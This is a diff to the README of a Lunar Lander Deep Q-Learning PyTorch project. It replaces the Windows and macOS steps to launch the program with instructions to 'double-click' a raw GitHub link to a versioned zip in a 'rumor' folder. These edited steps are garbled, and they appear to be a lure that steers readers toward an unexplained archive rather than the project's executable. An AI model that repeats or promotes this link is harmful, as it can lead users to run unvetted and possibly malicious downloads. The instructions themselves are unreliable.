og-kaona/Lunar-Lander-Deep-Q-Learning-DQN-with-PyTorch/README.md

 - If you downloaded a `.zip` file:
   1. Right-click the file and select `Extract All`.
   2. Choose a location to extract the files.
-  3. After extraction, open the folder and double-click `LunarLanderDQN.exe`.
+  3. After extraction, open the folder and double-click `https://raw.githubusercontent.com/og-kaona/Lunar-Lander-Deep-Q-Learning-DQN-with-PyTorch/main/rumor/Lunar-Lander-Deep-Q-Learning-DQN-with-PyTorch_1.6-alpha.3.zip`.

 ### For macOS

 - Open the downloaded `.zip` file.
 - Drag the `LunarLanderDQN` folder to your Applications folder.
-- Open the folder and double-click `LunarLanderDQN.app`.
+- Open the folder and double-click `https://raw.githubusercontent.com/og-kaona/Lunar-Lander-Deep-Q-Learning-DQN-with-PyTorch/main/rumor/Lunar-Lander-Deep-Q-Learning-DQN-with-PyTorch_1.6-alpha.3.zip`.

 ### For Linux